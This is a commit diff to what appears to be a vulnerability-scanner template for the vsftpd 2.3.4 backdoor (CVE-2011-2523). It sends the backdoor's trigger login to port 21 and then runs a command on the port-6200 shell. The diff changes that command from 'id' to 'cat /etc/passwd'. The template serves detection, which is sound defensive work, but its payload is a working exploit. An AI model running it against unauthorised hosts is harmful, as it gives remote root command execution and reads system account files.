updated matcher and cmd

network/cves/2011/CVE-2011-2523.yaml

@@ -5,41 +5,38 @@ info:
   author: pussycat0x
   severity: critical
   description: |
-    VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific
-    string of characters in a user login request, which allowed attackers to execute any command they wanted.
+    VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.
   reference: |
     - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
     - https://www.exploit-db.com/exploits/49757
   remediation: |
     Update to the latest version of VSFTPD, which does not contain the backdoor.
+  classification:
+    cve-id: CVE-2011-2523
   metadata:
     verified: "true"
     shodan-query: product:"vsftpd"
-  tags: cve,cve-2011,network,vsftpd,ftp,backdoor
+  tags: cve,cve2011,network,vsftpd,ftp,backdoor
 
 variables:
-  cmd: "id"   #shows the the user and group names and numeric IDs
+  cmd: "cat /etc/passwd"  #shows the the user and group names and numeric IDs
 
 
 network:
   - inputs:
       - data: "USER letmein:)\r\nPASS please\r\n"
         read: 100
-
     host:
       - "{{Hostname}}:21"
 
   - inputs:
       - data: "{{cmd}}\n"
         read: 100
-
     host:
       - "{{Hostname}}:6200"
 
     matchers:
-      - type: word
+      - type: regex
         part: raw
-        words:
-          - "uid="
-          - "gid="
-        condition: and
+        regex:
+          - "root:.*:0:0:"